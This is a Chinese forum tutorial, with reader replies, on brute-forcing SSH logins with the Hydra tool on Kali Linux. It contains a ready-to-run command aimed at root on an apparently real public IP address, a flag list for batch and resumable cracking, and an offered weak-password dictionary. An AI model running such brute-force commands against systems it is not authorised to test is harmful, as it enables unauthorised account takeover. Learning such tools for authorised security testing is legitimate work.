#干货满满#安全运维Kali中常用SSH暴力破解工具

hydra（thc hydra）是一个在线密码攻击工具。支持Linux、Windows、Mac平台安装它在telnet、ssh、http、https、smb、snmp、smtp等实时服务上强制各种组合。由于Kali Linux中自带Hydra，我这边就不介绍怎么安装Hydra，有需要的可以百度下，很容易找到，下面直接讲如何用它。

下面以示例演示下SSH暴力登录：

hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

root@kali:/mnt# hydra -l root -P /root/桌面/weakpass/top500_pass.txt  -t 2 -vV -e ns 36.137.21.162  ssh

参数：

-l login 小写，指定用户名进行破解

-L file 大写，指定用户的用户名字典

-p pass 小写，用于指定密码破解，很少使用，一般采用密码字典。

-P file 大写，用于指定密码字典。

-e ns 额外的选项，n：空密码试探，s：使用指定账户和密码试探

-M file 指定目标ip列表文件，批量破解。

-o file 指定结果输出文件

-f 找到第一对登录名或者密码的时候中止破解。

-t tasks 同时运行的线程数，默认是16

-w time 设置最大超时时间，单位

-v / -V 显示详细过程

-R 恢复爆破（如果破解中断了，下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。）

-x 自定义密码。

破解成功，会直接显示结果。

******密码本需要自己收集，有需要的话我这边也有网上大佬收集很全的密码本，需要的可以自行下载，喜欢我的帖子记得点赞收藏：

弱口令密码本.zip (168.71 KB, 下载次数: 29)

2022-10-18 17:09 上传

点击文件名下载附件

非常感谢楼主的分享，将hydra工具进行了简单的使用，很经典的使用场景和使用方式，让小白也可以快速上手。期待楼主的下次分享！（PS：贴心的附上了字典）

感谢楼主分享，努力学习中！！！！！！

每天学习一点新知识，谢谢分享

楼主分析的很详细，不错的实战经验，小白用户一看就懂，非常好的技术干货帖，顶一个！

资料非常详细，感谢分享知识

感谢楼主分享，学习一下

资料非常详细，感谢分享知识

感谢分享

资料非常详细，感谢分享知识